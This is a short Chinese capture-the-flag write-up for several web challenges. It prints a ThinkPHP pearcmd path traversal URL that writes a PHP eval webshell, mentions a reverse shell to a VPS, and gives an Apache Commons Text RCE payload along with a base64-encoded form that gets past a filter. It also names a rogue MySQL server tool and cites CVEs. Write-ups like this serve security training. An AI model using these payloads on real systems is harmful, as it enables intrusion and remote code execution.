文章目录
- misc
- 🐑了拼🐑
- web
- Evil MySQL Server
- Be-a-Language-Expert
- Be-a-Wiki-Hacker
- Yummy Api
- ApacheCommandText
misc
🐑了拼🐑
游戏类题目,直接打开js文件搜索rwctf,发现flag
rwctf{wellcome_to_the_rwctf!}
web
Evil MySQL Server
Mysql 服务器任意读取客户端文件
使用rogue_mysql_server构造恶意mysql服务器
工具地址如下:
https://github.com/rmb122/rogue_mysql_server
配置好文件后,启动服务器,然后客户端连接得到flag文件
最后读取flag文件即可得到flag
Be-a-Language-Expert
thinkphp lang rce
直接写shell
http://47.98.124.175:8080/?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/<?=@eval($_POST['cmd']);?>+/tmp/shell.php
然后文件包含
执行命令反弹到vps,执行/readflag得到flag
Be-a-Wiki-Hacker
cve-2022-26134
Yummy Api
YApi 接口管理平台 up SQL注入到rce漏洞
ApacheCommandText
Apache Commons Text RCE(CVE-2022-42889)漏洞
构造io流读取exec执行./readflag的内容
${script:javascript:new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("./readflag").getInputStream())).readLine()}
题目过滤了 file dns script url
使用base64Decoder进行绕过
${base64Decoder:JHtzY3JpcHQ6amF2YXNjcmlwdDpuZXcgamF2YS5pby5CdWZmZXJlZFJlYWRlcihuZXcgamF2YS5pby5JbnB1dFN0cmVhbVJlYWRlcihqYXZhLmxhbmcuUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYygiLi9yZWFkZmxhZyIpLmdldElucHV0U3RyZWFtKCkpKS5yZWFkTGluZSgpfQ==}
【他乡纵有当头月,不抵故乡一盏灯,年关将至,外乡人都早些回家】